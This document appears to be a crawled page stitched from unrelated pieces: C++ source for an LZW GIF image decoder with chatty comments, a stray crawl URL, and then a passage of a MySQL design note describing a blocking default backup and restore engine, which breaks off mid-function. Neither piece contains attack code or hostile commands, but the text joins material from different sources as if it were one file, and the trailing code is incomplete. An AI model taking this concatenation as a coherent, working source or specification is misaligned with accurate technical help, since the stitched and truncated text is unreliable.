Plum-Hall Associates...) */ LOCAL byte stack[MAX_CODES + 1]; /* Stack for storing pixels */ LOCAL byte suffix[MAX_CODES + 1]; /* Suffix table */ LOCAL USHORT prefix[MAX_CODES + 1]; /* Prefix linked list */ /* SHORT decoder(linewidth) * SHORT linewidth; * Pixels per line of image * * * - This function decodes an LZW image, according to the method used * in the GIF spec. Every *linewidth* "characters" (ie. pixels) decoded * will generate a call to out_line(), which is a user specific function * to display a line of pixels. The function gets it's codes from * get_next_code() which is responsible for reading blocks of data and * seperating them into the proper size codes. Finally, get_byte() is * the global routine to read the next byte from the GIF file. * * It is generally a good idea to have linewidth correspond to the actual * width of a line (as specified in the Image header) to make your own * code a bit simpler, but it isn't absolutely necessary. * * Returns: 0 if successful, else negative. (See ERRS.H) * */ SHORT GIFDecoder::decoder(SHORT linewidth, INT& bad_code_count) { FAST byte *sp, *bufptr; byte *buf; FAST SHORT code, fc, oc, bufcnt; SHORT c, size, ret; /* Initialize for decoding a new image... */ bad_code_count = 0; if ((size = get_byte()) < 0) return(size); if (size < 2 || 9 < size) return(BAD_CODE_SIZE); /* out_line = outline;*/ init_exp(size); // printf("L %d %x\n",linewidth,size); /* Initialize in case they forgot to put in a clear code. * (This shouldn't happen, but we'll try and decode it anyway...) */ oc = fc = 0; /* Allocate space for the decode buffer */ if ((buf = new byte[linewidth + 1]) == NULL) return(OUT_OF_MEMORY); /* Set up the stack pointer and decode buffer pointer */ sp = stack; bufptr = buf; bufcnt = linewidth; /* This is the main loop. For each code we get we pass through the * linked list of prefix codes, pushing the corresponding "character" for * each code onto the stack. When the list reaches a single "character" * we push that on the stack too, and then start unstacking each * character for output in the correct order. Special handling is * included for the clear code, and the whole thing ends when we get * an ending code. */ while ((c = get_next_code()) != ending) { /* If we had a file error, return without completing the decode */ if (c < 0) { delete[] buf; return(0); } /* If the code is a clear code, reinitialize all necessary items. */ if (c == clear) { curr_size = size + 1; slot = newcodes; top_slot = 1 << curr_size; /* Continue reading codes until we get a non-clear code * (Another unlikely, but possible case...) */ while ((c = get_next_code()) == clear) ; /* If we get an ending code immediately after a clear code * (Yet another unlikely case), then break out of the loop. */ if (c == ending) break; /* Finally, if the code is beyond the range of already set codes, * (This one had better NOT happen... I have no idea what will * result from this, but I doubt it will look good...) then set it * to color zero. */ if (c >= slot) c = 0; oc = fc = c; /* And let us not forget to put the char into the buffer... And * if, on the off chance, we were exactly one pixel from the end * of the line, we have to send the buffer to the out_line() * routine... */ *bufptr++ = c; if (--bufcnt == 0) { if ((ret = out_line(buf, linewidth)) < 0) { delete[] buf; return(ret); } bufptr = buf; bufcnt = linewidth; } } else { /* In this case, it's not a clear code or an ending code, so * it must be a code code... So we can now decode the code into * a stack of character codes. (Clear as mud, right?) */ code = c; /* Here we go again with one of those off chances... If, on the * off chance, the code we got is beyond the range of those already * set up (Another thing which had better NOT happen...) we trick * the decoder into thinking it actually got the last code read. * (Hmmn... I'm not sure why this works... But it does...) */ if (code >= slot) { if (code > slot) ++bad_code_count; code = oc; *sp++ = fc; } /* Here we scan back along the linked list of prefixes, pushing * helpless characters (ie. suffixes) onto the stack as we do so. */ while (code >= newcodes) { *sp++ = suffix[code]; code = prefix[code]; } /* Push the last character on the stack, and set up the new * prefix and suffix, and if the required slot number is greater * than that allowed by the current bit size, increase the bit * size. (NOTE - If we are all full, we *don't* save the new * suffix and prefix... I'm not certain if this is correct... * it might be more proper to overwrite the last code... */ *sp++ = code; if (slot < top_slot) { suffix[slot] = fc = code; prefix[slot++] = oc; oc = c; } if (slot >= top_slot) if (curr_size < 12) { top_slot <<= 1; ++curr_size; } /* Now that we've pushed the decoded string (in reverse order) * onto the stack, lets pop it off and put it into our decode * buffer... And when the decode buffer is full, write another * line... */ while (sp > stack) { *bufptr++ = *(--sp); if (--bufcnt == 0) { if ((ret = out_line(buf, linewidth)) < 0) { delete[] buf; return(ret); } bufptr = buf; bufcnt = linewidth; } } } } ret = 0; if (bufcnt != linewidth) ret = out_line(buf, (linewidth - bufcnt)); delete[] buf; return(ret); }
http://read.pudn.com/downloads/sourcecode/graph/1410/CIMAGE/GIFDECOD.CPP__.htm
crawl-002
refinedweb
1,033
67.59
Debugging RxJS, Part 1: Tooling I’m moving away from Medium. This article, its updates and more recent articles are hosted on my personal blog: ncjamieson.com. I’m an RxJS convert and I’m using it in all of my active projects. With it, many things that I once found to be tedious are now straightforward. However, there is one thing that isn’t: debugging. The compositional and sometimes-asynchronous nature of RxJS can make debugging something of a challenge: there isn’t much state to inspect; and the call stack is rarely helpful. The approach I’ve used in the past has been to sprinkle do operators and logging throughout the codebase — to inspect the values that flow through composed observables. For a number of reasons, this approach is not one with which I’ve been satisfied: - I always seem to have to add more logging, changing the code whilst debugging it; - once debugged, I either have to remove the logging or put up with spurious output; - conditional logging to avoid said output looks pretty horrid when slapped in the middle of a nicely composed observable; - even with a dedicated logoperator, the experience is still less than ideal. Recently, I set aside some time to build a debugging tool for RxJS. There were a number of features that I felt the tool must have: - it should be as unobtrusive as possible; - it should not be necessary to have to continually modify code to debug it; - in particular, it should not be necessary to have to delete or comment out debugging code after the problem is solved; - it should support logging that can be easily enabled and disabled; - it should support capturing snapshots that can be compared over time; - it should offer some integration with the browser console — for switching debugging features on/off and for investigating state, etc. And some more that would be nice to have: - it should support pausing observables; - it should support modifying observables or the values they emit; - it should support logging mechanisms other than the console; - it should be extensible; - it should go some way towards capturing the data required to visualize subscription dependencies. With those features in mind, I built rxjs-spy. Core Concepts rxjs-spy introduces a tag operator that associates a string tag with an observable. The operator does not change the observable’s behaviour or values in any way. The tag operator can be used alone — import "rxjs-spy/add/operator/tag" — and the other rxjs-spy methods can be omitted from production builds, so the only overhead is the string annotations. Most of the tool’s methods accept matchers that determine to which tagged observables they will apply. Matchers can be simple strings, regular expressions or predicates that are passed the tag itself. When the tool is configured via a call to its spy method, it patches Observable.prototype.subscribe so that it is able to spy on all subscriptions, notifications and unsubscriptions. That does mean, however, that only observables that have been subscribed to will be seen by the spy. rxjs-spy exposes a module API that is intended to be called from code and a console API that is intended for interactive use in the browser’s console. Most of the time, I make a call to the module API's spy method early in the application’s start-up code and perform the remainder of the debugging using the console API. Console API Functionality When debugging, I usually use the browser’s console to inspect and manipulate tagged observables. The console API functionality is most easily explained by example — and the examples that follow work with the observables in this code: The console API in rxjs-spy is exposed via the rxSpy global. Calling rxSpy.show() will display a list of all tagged observables, indicating their state (incomplete, complete or errored), the number of subscribers and the most recently emitted value (if one has been emitted). The console output will look something like this: To show the information for only a specific tagged observable, a tag name or a regular expression can be passed to show: Logging can be enabled for tagged observables by calling rxSpy.log: Calling log with no arguments will enable the logging of all tagged observables. Most methods in the module API return a teardown function that can be called to undo the method call. In the console, that’s tedious to manage, so there is an alternative. Calling rxSpy.undo() will display a list of the methods that have been called: Calling rxSpy.undo and passing the number associated with the method call will see that call’s teardown function called. For example, calling rxSpy.undo(3) will see the logging of the interval observable undone: Sometimes, it’s useful to modify an observable or its values whilst debugging. The console API includes a let method that functions in much the same way as the RxJS let operator. It’s implemented in such a way that calls to the let method will affect both current and future subscribers the to tagged observable. For example, the following call will see the people observable emit mallory — instead of alice or bob: As with the log method, calls to the let method can be undone: Being able to pause an observable when debugging is something that’s become almost indispensable, for me. Calling rxSpy.pause will pause a tagged observable and will return a deck that can be used to control and inspect the observable’s notifications: Calling log on the deck will display the whether or not the observable is paused and will display the paused notifications. (The notifications are RxJS Notification instances obtained using the materialize operator). Calling step on the deck will emit a single notification: Calling resume will emit all paused notifications and will resume the observable: Calling pause will see the observable placed back into a paused state: It’s easy to forget to assign the returned deck to a variable, so the console API includes a deck method that behaves in a similar manner to the undo method. Calling it will display a list of the pause calls: Calling it and passing the number associated with the call will see the associated deck returned: Like the log and let calls, the pause calls can be undone. And undoing a pause call will see the tagged observable resumed: Hopefully, the above examples will have provided an overview of rxjs-spy and its console API. The follow-up parts of Debugging RxJS will focus on specific features of rxjs-spy and how they can be used to solve actual debugging problems. For me, rxjs-spy has certainly made debugging RxJS significantly less tedious. More Information The code for rxjs-spy is available on GitHub and there is an online example of its console API. The package is available for installation via NPM. For the next article in this series, see Debugging RxJS, Part 2: Logging.
https://medium.com/angular-in-depth/debugging-rxjs-4f0340286dd3
CC-MAIN-2020-10
refinedweb
1,166
55.27
C++ Reading from a file Program Hello Everyone! In this tutorial, we will learn how to open and read the contents of a file, in the C++ programming language. To understand this concept from basics, we will highly recommend you to refer to this: C++ File Stream, where we have discussed this concept and the various terminologies involved in it, in detail. The step by step commented code can be seen below: Code: #include<iostream> #include<fstream> //to make use of system defined functions for file handling using namespace std; int main() { cout << "\n\nWelcome to Studytonight :-)\n\n\n"; cout << " ===== Program to demonstrate how to read the contents from a file ===== \n\n"; //declaration of a string variable string str; // creating a variable of type ifstream to make use of file handling commands and open a file in read mode. ifstream in; //open is a system defined method to open and read from the mentioned file in.open("studytonight.txt"); //Make sure that the file is within the same folder as that of this program otherwise, will have to provide the entire path to the file to read from cout << "Reading content from the file and it's contents are: \n\n"; // printing the data word by word while(in>>str) cout << str << " "; cout << "\n\n\n"; // close the file opened before. in.close(); return 0; } The contents of the studytonight.txt file are: Studytonight: Our mission is to empower young Students to be the inventors and creators. Output : We hope that this post helped you develop a better understanding of the concept of reading the contents from a file, in C++. For any query, feel free to reach out to us via the comments section down below. Keep Learning : )
https://studytonight.com/cpp-programs/cpp-reading-from-a-file-program
CC-MAIN-2021-04
refinedweb
291
60.58
Welcome to the Rockbox Technical Forums! I committed a small part of the patch now that seemed clean and not likely to cause troubles for anyone else.Some parts of the remainder of the patch seems to modify stock dm320 code that isn't clean enough to commit. And then I'm not sure how valid the firmware/target/arm/tms320dm320/creative-zvm parts are.Comments?I just want to help getting the core vision:m stuff added so that more people can join in this effort and help easier. The only DM320 stuff I changed are in system-dm320.c (which I've enabled back since it doesn't cause any trouble) and in spi-dm320.c (which sets M:Robe 500 target specific GIO stuff and disables GIO stuff using spi_disable_all_targets() which isn't present at the ZVM and shouldn't be touched) As for the target/arm/tms320dm320/creative-zvm/ : these are just stubs so that Rockbox can compile (I haven't enabled these during boot in the bootloader). Right, but those changes are unconditional and thus I don't dare to commit them since all I know they make cause trouble in the mrobe 500 camp. Well, if they are truly only stubs I would rather see them as stubs only and then I wouldn't mind committing them. Atm it seems like lots of leftovers from other parts that you probably used as basis when you copied these from elsewhere in Rockbox.I'm not really complaining, I'm just explaining my reasoning why I didn't commit more files (yet). Hmm, are you using the compiler from TI or uhm, well gcc-arm? Because I want to start taking a look at how I might use the code for my ZV Btw. Awesome work! inline bool usb_detect(void){ return ( (*((volatile unsigned short*)(0x60FFC018))) & 0x100)>>8;} edit2: I'm trying to compile a bootloader, but I'm getting: 'ERROR: x uses FPA instructions, whereas y does not'and other linker errorsedit3: found it, apparently -mcpu=arm926ej-s should be -mcpu=arm9 (or at least on my machine) Quoteedit3: found it, apparently -mcpu=arm926ej-s should be -mcpu=arm9Hmm, I have the same errors here, but if I change arm926ej-s to arm9 in the makefile, it'll only change to even more errors saying ERROR: X uses VPF instructions, where.... edit3: found it, apparently -mcpu=arm926ej-s should be -mcpu=arm9 edit2: I'm afraid I can't check if it works because the firmware maker gets all sizes wrong... Did you guys build your arm-elf toolchain with the rockboxdev.sh build script? What do you mean by 'the firmware maker'? Scramble? CreativeWizard? Oh yeah right, that's kind of ambiguous.. I meant Creative Wizard. Edit:Where do you set LCD_HEIGHT and _WIDTH? more specific IO_OSD_OSDWIN0OFST (the format is (LCD_WIDTH*bpp)/256 ) Page created in 0.094 seconds with 16 queries.
https://forums.rockbox.org/index.php/topic,3320.420.html?PHPSESSID=b344166292ab76926a86d968bda05244
CC-MAIN-2021-25
refinedweb
487
70.23
Source code: :source:`Lib/cgi.py` Support module for Common Gateway Interface (CGI) scripts. This module defines a number of utilities for use by CGI scripts written in Python. A(" CGI script output") print(" This is my first CGI script") print("Hello, world!"): print(" Error") print("Please fill in the name and addr fields.") return print(" name:", form["name"].value) print("() method, bytes. This may not be what you want. You can test for an uploaded file by testing either the filename attribute or the file attribute. You can then read the data()) These are useful if you want more control, or if you want to employ some of the algorithms implemented in this module in other circumstances. sys.stdin). The keep_blank_values, strict_parsing and separator parameters are passed to urllib.parse.parse_qs() unchanged. Parse input of type multipart/form-data (for file uploads). Arguments are fp for the input file, pdict for a dictionary containing other parameters in the Content-Type header, and encoding, the request encoding. Returns a dictionary just like urllib.parse.parse_qs(): keys are the field names, each value is a list of values for that field. For non-file fields, the value is a list of strings. This is easy to use but not much good if you are expecting megabytes to be uploaded — in that case, use the FieldStorage class instead which is much more flexible. Changed in version 3.7: Added the encoding and errors parameters. For non-file fields, the value is now a list of strings, not bytes. Changed in version 3.7.10: Added the separator parameter.),oo644 for readable and 0o lines:. tail -f logfilein a separate window may be useful!) python script.py. import cgitb; cgitb.enable()to the top of the script. PATHis usually not set to a very useful value in a CGI script. suexecfeature. Footnotes
https://getdocs.org/Python/docs/3.7/library/cgi
CC-MAIN-2021-49
refinedweb
309
69.18
Every once in a while you’ll come across an idea where keeping time a prime concern. For example, imagine a relay that has to be activated at a certain time or a data logger that has to store values at precise intervals. The first thing that comes in your mind is to use an RTC (Real Time Clock) chip. But these chips are not perfectly accurate so, you need to do manual adjustments over and over again to keep them synchronized. The solution here is to use Network Time Protocol (NTP). If your ESP32 project has access to the Internet, you can get date and time (with a precision within a few milliseconds of UTC) for FREE. You don’t need any additional hardware. What is an NTP? An NTP stands for Network Time Protocol. It’s a standard Internet Protocol (IP) for synchronizing the computer clocks to some reference over a network. The protocol can be used to synchronize all networked devices to Coordinated Universal Time (UTC) within a few milliseconds ( 50 milliseconds over the public Internet and under 5 milliseconds in a LAN environment). Coordinated Universal Time (UTC) is a world-wide time standard, closely related to GMT (Greenwich Mean Time). Architecture. Each stratum in the hierarchy synchronizes to the stratum above and act as servers for lower stratum computers. How NTP Works? NTP can operate in a number of ways. The most common configuration is to operate in client-server mode. The basic working principle is as follows: - The client device such as ESP32 connects to the server using the User Datagram Protocol (UDP) on port 123. - A client then transmits a request packet to a NTP server. - In response to this request the NTP server sends a time stamp packet. - A time stamp packet contains multiple information like UNIX timestamp, accuracy, delay or timezone. - A client can then parse out current date & time values. Preparing the Arduino IDE Enough of the theory, Let’s Go Practical! But before venturing further into this tutorial, you should have the ESP32 add-on installed in your Arduino IDE. Follow below tutorial to prepare your Arduino IDE to work with the ESP32, if you haven’t already. Getting Date and Time from NTP Server The following sketch will give you complete understanding on how to get date and time from the NTP Server. Before you head for uploading the sketch, you need to make some changes to make it work for you. - You need to modify the following two variables with your network credentials, so that ESP32 can establish a connection with existing network. const char* ssid = "YOUR_SSID"; const char* password = "YOUR_PASS"; - You need to adjust the UTC offset for your timezone in milliseconds. Refer the list of UTC time offsets. Here are some examples for different timezones: - For UTC -5.00 : -5 * 60 * 60 : -18000 - For UTC +1.00 : 1 * 60 * 60 : 3600 - For UTC +0.00 : 0 * 60 * 60 : 0 const long gmtOffset_sec = 3600; - Change the Daylight offset in milliseconds. If your country observes Daylight saving time set it to 3600. Otherwise, set it to 0. const int daylightOffset_sec = 3600; Once you are done, go ahead and try the sketch out. #include <WiFi.h> #include "time.h" const char* ssid = "YOUR_SSID"; const char* password = "YOUR_PASS"; const char* ntpServer = "pool.ntp.org"; const long gmtOffset_sec = 3600; const int daylightOffset_sec = 3600; void printLocalTime() { struct tm timeinfo; if(!getLocalTime(&timeinfo)){ Serial.println("Failed to obtain time"); return; } Serial.println(&timeinfo, "%A, %B %d %Y %H:%M:%S"); }(); } After uploading the sketch, press the EN button on your ESP32, and you should get the date and time every second as shown below. Code Explanation Let’s take a quick look at the code to see how it works. First, we include the libraries needed for this project. - WiFi.h library provides ESP32 specific WiFi methods we are calling to connect to network. - time.h is the ESP32 native time library which does graceful NTP server synchronization. #include <WiFi.h> #include "time.h" Next, we set up a few constants like SSID, WiFi password, UTC Offset & Daylight offset that you are already aware of. Along with that we need to specify the address of the NTP Server we wish to use. pool.ntp.org is an open NTP project great for things like this. const char* ntpServer = "pool.ntp.org"; The pool.ntp.org automatically picks time servers which are geographically close for you. But if you want to choose explicitly, use one of the sub-zones of pool.ntp.org. In setup section, we first initialize serial communication with PC and join the WiFi network using WiFi.begin() function. Serial.begin(115200); //connect to WiFi Serial.printf("Connecting to %s ", ssid); WiFi.begin(ssid, password); while (WiFi.status() != WL_CONNECTED) { delay(500); Serial.print("."); } Serial.println(" CONNECTED");. getLocalTime() function is used to transmit a request packet to a NTP server and parse the received time stamp packet into to a readable format. It takes time structure as a parameter. You can access the date & time information by accessing members of this time structure. void printLocalTime() { struct tm timeinfo; if(!getLocalTime(&timeinfo)){ Serial.println("Failed to obtain time"); return; } Serial.println(&timeinfo, "%A, %B %d %Y %H:%M:%S"); }
https://lastminuteengineers.com/esp32-ntp-server-date-time-tutorial/
CC-MAIN-2019-35
refinedweb
876
58.48
Hi Igor, On Sun, Oct 29, 2000 at 12:38:32AM -0400, Igor Khavkine wrote: > Ok, I took took heed of the comments that I recieved and I updated > the patch. So here it is, less __GNU__ and more common sense. The patch > should work for Linux and Hurd so it can be incorporated into the debian > package right away, whether it should be submitted to the upstream maintainers > should most probably be at the discretion of the debian maintainer. It looks better now, but still there are some __GNU__ parts which are unnecessary, and can be fixed nicer. PAM is using autoconf, right? So I would suggest to add a check for asprintf, or, maybe better, not to use asprintf at all but malloc (strlen(pwd->pw_dir) + sizeof(USER_RHOSTS_FILE) + 2) and sprintf. This should be done unconditionally on all systems, because there is no need to keep the code for a static buffer when the code to allocate a buffer dynamically works fine on "legacy" system :) also. This is exactly what you did with termio->termios conversion, and this part of the patch looks very clean and nice. For MAXHOSTNAMELEN, I suggest an autoconf check for <net/if.h>, and include it only #ifdef HAVE_NET_IF_H. This removes one more __GNU__. For MAXDNAME I suggest #ifndef MAXDNAME instead checking for __GNU__. For MAXHOSTNAMELEN, dynamic allocation can be enabled for all systems also (maybe there needs to be an additional check on systems which define MAXHOSTNAMELEN if the name is not too long, but often this check is done by library functions, and those errors are handled corrected automatically in response to ENAMETOOLONG). Otherwise, if you disagree, enabling the dynamic code for systems which don't define MAXHOSTNAMELEN would also be a solution. The use of getline is problematic, as it is a GNU extension. You need to #define _GNU_SOURCE to get it prototyped. There should be an autoconf check for this. You can enable _GNU_SOURCE in autoconf like this (early in configure.in): CFLAGS="-D_GNU_SOURCE $CFLAGS" although I am not sure if this is the proper solution... mmh. The use of __GNU__ is justified, as this is a real GNU shortage. But to give other short failing systems the same advantage this fix gives to us, it makes sense to use again a feature based check and not a system based one. So: ifdef __GNU__ -> ifndef SA_RESETHAND etc. diff -ru Linux-PAM-0.72.orig/modules/pam_unix/unix_chkpwd.c Linux-PAM-0.72/modules/pam_unix/unix_chkpwd.c --- Linux-PAM-0.72.orig/modules/pam_unix/unix_chkpwd.c Tue Oct 24 23:23:01 2000 +++ Linux-PAM-0.72/modules/pam_unix/unix_chkpwd.c Wed Oct 25 00:37:59 2000 @@ -51,6 +51,11 @@ static void su_sighandler(int sig) { +#ifndef SA_RESETHAND + /* emulate the behavior of the SA_RESETHAND flag */ + if (sig == SIGILL || sig == SIGTRAP || sig == SIGBUS || sig == SIGSEGV) + signal(sig, SIG_DFL); +#endif if (sig > 0) { _log_err(LOG_NOTICE, "caught signal %d.", sig); exit(sig); @@ -66,7 +71,9 @@ */ (void) memset((void *) &action, 0, sizeof(action)); action.sa_handler = su_sighandler; +#ifdef SA_RESETHAND action.sa_flags = SA_RESETHAND; +#endif (void) sigaction(SIGILL, &action, NULL); (void) sigaction(SIGTRAP, &action, NULL); (void) sigaction(SIGBUS, &action, NULL); Thanks, Marcus -- `Rhubarb is no Egyptian god.' Debian brinkmd@debian.org Marcus Brinkmann GNU marcus@gnu.org Marcus.Brinkmann@ruhr-uni-bochum.de
https://lists.debian.org/debian-hurd/2000/10/msg00405.html
CC-MAIN-2015-14
refinedweb
548
54.73
IO Section Index | Page 6 How do I set a system property when using an executable jar (one with an entry of Main-Class: ClassName)? Just like with executing a program just use the the -D flag along with the -jar flag. Here is my test case: public class property { public static void main(String[] args) { System.ou.. How can I implement the Unix "cksum" command in Java? How can I implement the Unix "cksum" command in Java? I'm using a CheckedInputStream and creating a new instance of CRC32 to pass it, but I don't get the same checksum value as cksum give me.more Is there any method in Java that will convert hexadecimal characters to binary characters? You can use Integer.parseInt() or Long.parseLong() to convert a hexadecimal representation to a 4-byte int or an 8-byte long, respectively. For example, the Java class file magic number 0xCAFEBAB...more How? Check out java.lang.FileWriter and java.lang.FileOutputStream. They both have a constructor that takes a boolean parameter for appending or not the data. Where can I learn (more) about Java's support for developing multi-threaded programs? Where can I learn (more) about Java networking capabilities? How do I change the working directory of a program from inside Java? Can I use "user.dir"? The short answer is that you can't. Note that setting the "user.dir" in Java doesn't change the working directory - it only seems to ;). All it really does is update the path that the m...more cha.. write a text document in PDF format? The only third-party class library that I know of for doing this is called retepPDF. It can be found at. How can I read a single character from the keyboard without having to press the 'enter' button and without using GUI classes like KeyListener? The solution to this problem is OS dependent. On Win32 you would need to use JNI to call the SetConsoleMode function to disable the line buffering. For an example of using this method, Are there any third-party Java classes that support reading and interacting with SVG files? The Batik Toolkit from Apache lets you do this. See. How can I examine or change file permissions and ownership using Java? Standard Java provides no means to access or change file permissions / ownership. Short of using JNI, there is no way to access or preserve this information.
http://www.jguru.com/faq/core-java-technology/io?page=6
CC-MAIN-2015-22
refinedweb
409
68.06
Reckoner Nick Huanca ・2 min read Recently I've been working on shoring up some of the user-experience and functionality of Reckoner, an open source tool that works in conjunction with helm to enable repeatable, declarative of helm charts onto kubernetes clusters. It also supports pointing to git repositories as a chart source, something which helm alone currently doesn't support. A common use case is when you want to install nginx-ingress on a cluster and you want to be able to check all your chart values into source control. Below is an example of a course.yml, the definition file that reckoner uses to install charts. # course.yml charts: nginx-ingress: namespace: ingress-controllers version: 1.15.1 values: controller.ingressClass: "my-ingress-class-name" Running reckoner with a reckoner plot course.yml will make sure helm installs nginx-ingress in your clusters with the settings you've provided. At Fairwinds we use reckoner to install core infrastructure to all our clusters and manage chart values for things related to that core infrastructure. Since reckoner was started in python, we decided it would be too much work to port it to another language just for easier binary distribution. Luckily, PyInstaller allowed us to "compile" a self-contained binary that could be run on Linux or OS X systems. This made our lives so much easier for the installation story and has also helped with our end to end testing, which we now do in CircleCI with kind. If you do try out reckoner and something is lacking, always feel free to reach out via dev.to or start a discussion in github issues! We've made changes to help people run reckoner in CI/CD and are always interested in how it can make people's lives just a tad easier. Thanks! How do you get back into a side project after months? Photo by Simon Migaj on Unsplash We've probably all been there, that boost o...
https://practicaldev-herokuapp-com.global.ssl.fastly.net/nickhuanca/reckoner-1peg
CC-MAIN-2019-39
refinedweb
331
62.58
connect Database...; mysql ; This query creates database 'usermaster' in Mysql. Connect JSP with mysql : Now in the following jsp code, you will see how to connect... Connect JSP with mysql     JSP Simple Examples in JSP An exception can occur if you trying to connect to a database... in JSP The while loop is a control flow statement, which allows code...: out> For Simple Calculation and Output In this example we have used paging in Jsp: jsp code - JSP-Servlet friend, pagination using jsp with database <...]; System.out.println("MySQL Connect Example."); Connection con...; } System.out.println("MySQL Connect Example."); Connection conn = null; String how to connect jsp with sql database by netbeans in a login page? how to connect jsp with sql database by netbeans in a login page? how to connect jsp with sql database by netbeans in a login page JSP code JSP code I get an error when i execute the following code : <... the following code its getting connected to database import java.sql.Connection... app only i am unable to connect the database. I am using Eclipse> jsp function - JSP-Servlet a simple example of JSP Functions Method in JSP See the given simple button Example to submit...:// JSP :// <jsp:useBean id="user.../jsp/simple-jsp-example/UseBean.shtml...how can we use beans in jsp how can we use beans in jsp   problem connect jsp and mysql - JSP-Servlet problem connect jsp and mysql hello, im getting an error while connecting jsp and mysql. I have downloaded the driver mysql-connector...; This is my code The error i get is as follows code - JSP-Servlet code how can i connect SQl database in javascript. and how to execute the query also i think u can not connect to SQL database in javascript. thanks sandeep How to connect mysql with jsp How to connect mysql with jsp how to connect jsp with mysql while using apache tomcat code - JSP-Servlet know how can i call database connection in javascript. please help me use some server side script like servlet or jsp, call these when user click in check box.in that u can connect to database.javascript is run on client machine jsp code - JSP-Servlet jsp code sample code for change password example Old Password: new Password: jsp jsp how to connect the database with jsp using mysql Hi Friend, Please visit the following links: Navigation in a database table through jsp . Create a database: Before run this jsp code first create a database named... Navigation in a database table through jsp This is detailed jsp code that shows how Connecting to MySQL database and retrieving and displaying data in JSP page Connecting to MySQL database and retrieving and displaying data in JSP page...; This tutorial shows you how to connect to MySQL database and retrieve the data from the database. In this example we will use tomcat version 4.0.3 to run our jsp code - JSP-Servlet jsp code sample code to create hyperlink within hyperlink example: reservation: train: A/C department non A/c Department jsp code - JSP-Servlet jsp code hello frns i want to display image from the database along... from database in Jsp to visit.... Thanks jsp - JSP-Servlet jsp i want to code in jsp servlet for login page containing username password submit and then change password.in this code how to maintain session...("password"); System.out.println("MySQL Connect Example simple bank application - JSP-Servlet simple bank application hi i got ur codings...But if we register a new user it is not updating in the database...so plz snd me the database also.... Thank you code for insert the value from jsp to access database code for insert the value from jsp to access database code for insert the value from jsp to access database Jsp - JSP-Servlet JSP date picker code I am digging for either a simple example or code to get the Date format in JSP Insert Image into Mysql Database through Simple Java Code Insert Image into Mysql Database through Simple Java Code... simple java code that how save image into mysql database. Before running this java code you need to create data base and table to save image in same database jsp code - Java Beginners JSP code and Example JSP Code Example the following links: JSP :// EL parser...Can you explain jsp page life cycle what is el how does el search JSP Simple Examples JSP Simple Examples Index 1. Creating.... Try catch in jsp In try block we write those code which can throw... page. Html tags in jsp In this example jsp code - JSP-Servlet ; For the above code, we have created following database tables...jsp code hi my requirement is generate dynamic drop down lists... statement? pls provide code how to get first selected drop down list value i want to add below code data in mysql database using jsp... using below code we got data in text box i want to add multiple data in database... Add/Remove dynamic rows in HTML table Retrieve image from mysql database through jsp to retrieve image from mysql database through jsp code. First create a database.... mysql> create database mahendra; Note : In the jsp code given below, image... Retrieve image from mysql database through unable to connect database in java unable to connect database in java Hello Everyone! i was trying to connect database with my application by using java but i am unable to connect... i was using this code.... try { Driver d=(Driver)Class.forName code to establish jdbc database connectivity in jsp code to establish jdbc database connectivity in jsp Dear sir, i'm in need of code and procedure to establish jdbc connectivity in jsp Simple problem to solve - JSP-Servlet Simple problem to solve Respected Sir/Madam, I am R.Ragavendran.. Thanks for your kind and timely help for the program I have asked... the code for ur kind refernce.. Here it is: EMPLOYEE</b> <% out.println("Unable to connect to database."); } %>...("Unable to connect to database."); } %> </font> </body> </html>...jsp Hi How can we display sqlException in a jsp page? How can we simple code for XML database in JS simple code for XML database in JS Sir , i want a code in javascript for XML database to store details (username and password entered by user during registration process (login process)). please send me a code . Thank you Simple JDBC Example ; } Simple JDBC Example To connect java application to the database we do...,'John',B.Tech') ; A Simple example is given below to connect a java...("MySQL Connect Example."); Connection conn = null; Statement stmt = null JSP - JSP-Interview Questions :// Thanks... This is simple code. A Comment Test A Test of Comments... are the comments in JSP(java server pages)and how many types and what are they.Thanks inadvance code for forget password JSP code for forget password I need forget password JSP code.. example for storing login and logout time to an account jsp code for storing login and logout time to an account I need simple jsp code for extracting and storing login and logout time in a database table...:// in JSP Code | Connect JSP with mysql | Create a Table in Mysql database... Windows Media Player | Connect JSP with mysql | Connect from database using... posted to a JSP file from HTML file | Accessing database from JSP | Implement Display Data from Database in JSP Display Data from Database in JSP This is detailed java program to connect java application with mysql database... jsp page. welcome_to_database_query.jsp <!DOCTYPE HTML PUBLIC " JSP Search Example code JSP Search - Search Book Example  ... the data from database. In this example we will search the book from database. We are using MySQL database and JSP & Servlet to create the application jsp jsp can u send the code to store search keywords from google server engine to my database
http://www.roseindia.net/tutorialhelp/comment/81442
CC-MAIN-2014-23
refinedweb
1,319
62.98
The algorithm used if the engine does not provide any backup algorithm of its own. This is a blocking (i.e. it is not online) algorithm. The idea is to use handlerton methods to scan each table and get all its rows in binary format. These rows will be stored in the backup image and upon restore will be inserted into tables using handlerton write methods. To avoid the issue of data changing while tables are scanned. All tables will be blocked during the backup process. The default backup mechanism should be implemented as a regular backup engine providing backup and restore drivers and implementing the backup API. The backup image will consist of several streams corresponding to the tables. Each stream will be a sequence of table rows as returned by handlerton read methods. Note: apparently there are two row formats used by storage engines which differ in the way null field values are represented. For the backup image *only one format should be used*. So, rows stored in a different format should be repacked accordingly. Mats is a person who knows about this issue. Since in this version default backup is blocking, it can pretend to be "at begin" type. Thus no data will be sent in the initial phase. BACKUP API implementation: ------------------------- - init_size Should be zero (but can be anything really). - size One can consider using statistical info to estimate number of rows in each table and thus find out approximate size of the whole backup image (not in the first version, though). - prepare The locking of the tables should be done here. No clear idea what is the best way of doing this... - get_data First call can return empty block for stream 0 indicating end of the initial phase. The following calls should return rows from tables assigned to corresponding streams. - lock Do nothing. - unlock. Do nothing. - cancel Cancel the process of creating backup image: unlock tables, clean engines state. RESTORE API implementation -------------------------- - prepare Do nothing (right now it is assumed that backup kernel locks all tables to be restored). - send_data Unpack table rows and insert them into tables. One can assume that data blocks will be received in the same order in which they were sent when the backup image was created. Thus if one decides to backup tables one by one, they can be also restored one by one. - continue Not sure what needs to be done. After this call the engine should be ready for normal operation with all the newly inserted rows. - cancel Interrupt restore process. All rows alread put into the tables will remain there. Implement in: namespace backup { // Default backup engine class Default_Engine: public Engine {...}; // Backup driver for default engine class Default_Engine::Backup: public Engine::Backup {...}; // Restore driver for default engine class Default_Engine::Restore: public Engine::Restore {...}; }; An example of how to open and scan table using its handler can be found in sql_help.cc. --------------------------------------- The following is a simplified segment of the default backup algorithm: int default_backup(THD *thd, TABLE_LIST *t) { t->table = open_ltable(thd, t, TL_READ_NO_INSERT); t->table->file->extra(HA_EXTRA_RETRIEVE_ALL_COLS); 